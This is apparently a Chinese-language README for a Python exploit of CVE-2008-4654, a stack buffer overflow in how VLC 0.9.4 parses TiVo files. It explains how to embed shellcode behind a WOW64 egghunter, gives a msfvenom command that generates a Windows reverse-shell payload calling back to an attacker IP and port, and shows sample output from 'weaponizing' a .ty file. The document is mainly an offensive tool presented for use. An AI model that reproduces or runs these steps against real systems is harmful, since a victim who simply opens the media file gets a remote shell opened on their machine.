
一个针对VideoLan的VLC Media Player 0.9.4在处理TiVo文件时存在的基于栈的缓冲区溢出漏洞的完整功能利用程序。
针对VideoLan的VLC Media Player 0.9.4在处理TiVo文件时出现的栈缓冲区溢出漏洞CVE-2008-4654的功能完整的利用程序。它针对运行在64位Windows系统上的32位二进制文件,并使用WOW64 egghunter来绕过有限的栈空间。
更新脚本:
buf = b'[...]' 替换为你自己的shellcode(例如,来自 msfvenom)。EGG_HUNTER_WOW64 shellcode。python .\CVE-2008-4654.py --help
CVE-2008-4654 - VLC v0.9.4 Tivo Stack Buffer Overflow - by Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
usage: CVE-2008-4654.py [-h] --input INPUT --output OUTPUT
将给定的TiVo文件转换为携带预定义shellcode的武器。
options:
-h, --help 显示此帮助信息并退出
--input INPUT 要武器化的输入TiVo文件路径。
--output OUTPUT 保存修改后(武器化)的TiVo文件的路径。
TIVO_PES_FILEID)。b"\x00\x00\x00\xff",从而设置越界读取,导致栈溢出。TIVO_PES_FILEID 后92字节处)替换为自定义载荷。w00tw00t。msfvenom -p windows/shell_reverse_tcp LHOST=192.168.10.150 LPORT=6666 -a x86 -f python -b '\x00'
buf = b'[...]' 替换为之前生成的shellcode。PS C:\ > python .\CVE-2008-4654.py --input .\test.ty --output .\hazard.ty
CVE-2008-4654 - VLC v0.9.4 Tivo Stack Buffer Overflow - by Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
[+] 在偏移量0x300000处找到TIVO_PES_FILEID。
[+] 将偏移量0x300014处的4字节替换为0x000000ff。
[+] 将偏移量0x30005c处的685字节替换为自定义载荷。
[+] 成功武器化:.\hazard.ty